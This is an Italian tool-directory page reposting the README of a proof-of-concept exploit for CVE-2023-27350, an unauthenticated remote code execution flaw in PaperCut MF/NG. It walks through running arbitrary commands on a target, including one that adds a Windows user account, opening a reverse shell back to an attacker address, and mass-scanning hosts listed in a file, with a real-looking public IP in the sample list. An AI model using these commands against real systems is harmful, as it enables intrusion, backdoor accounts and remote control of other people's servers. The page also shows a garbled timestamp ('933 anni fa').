Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-27350 — Exploit per Papercut CVE-2023-27350. [+] Reverse shell [+] Controllo di massa | Kitploit
Strumenti/GitHubGitHub/adhikara13/cve-2023-27350
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlSviluppo Payload
GitHubadhikara13/cve-2023-27350

CVE-2023-27350

Exploit per Papercut CVE-2023-27350. [+] Reverse shell [+] Controllo di massa

Vedi Repository
933 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

PoC dell'exploit CVE-2023-27350

Questo è un exploit Proof of Concept (POC) per CVE-2023-27350, una vulnerabilità presente in PaperCut MF/NG che consente a un attaccante non autenticato di eseguire codice arbitrario con privilegi SYSTEM.

Requisiti

Prima di usare questo exploit, assicurati di aver installato le seguenti librerie:

root@kitploit:~
pip install -r requirements.txt

Utilizzo

root@kitploit:~
python CVE-2023-27350.py -u <target url> [-c <command> | --reverse-shell | -f <file>]

Opzioni

  • -u, --url: L'URL dell'applicazione PaperCut MF/NG target (es., http://target-ip:9191).
  • -c, --command: Il comando da eseguire sul sistema target.
  • --reverse-shell: Usa un payload reverse shell per eseguire comandi sul sistema target.
  • -f, --file: Controlla più target da un file (es., file.txt).

Esempio

Eseguire un comando

Per eseguire un comando sul sistema target, usa l'opzione -c:

root@kitploit:~
python CVE-2023-27350.py -u http://target-ip:9191 -c "net user test test1234 /add"

Reverse Shell

Per usare un payload reverse shell per eseguire comandi sul sistema target, usa l'opzione --reverse-shell. Ti verrà chiesto di inserire il tuo indirizzo IP e il numero di porta:

root@kitploit:~
python exploit.py -u http://target-ip:9191 --reverse-shell
Enter your IP address: <attacker-ip>
Enter your port number: <port>

Controllo di massa

Per controllare più target da un file, usa l'opzione -f. Il formato del file deve essere ip_address:port:

root@kitploit:~
python CVE-2023-27350.py -f file.txt

Formattazione del file.txt

Quando usi l'opzione di controllo di massa con l'input file.txt, assicurati che il contenuto del file sia formattato correttamente.

Ogni riga del file deve contenere l'indirizzo IP e il numero di porta di un target, separati da due punti :. Per esempio:

root@kitploit:~
110.175.19.78:9191
110.175.19.78:80
192.168.1.1:8080

Assicurati che non ci siano spazi o caratteri extra tra l'indirizzo IP, i due punti e il numero di porta. Assicurati inoltre che ogni riga contenga solo un indirizzo IP e un numero di porta.

Crediti

Questo è un fork del repository horizon3ai/CVE-2023-27350. Tutti i crediti per l'exploit originale vanno agli autori.

Scarica lo strumento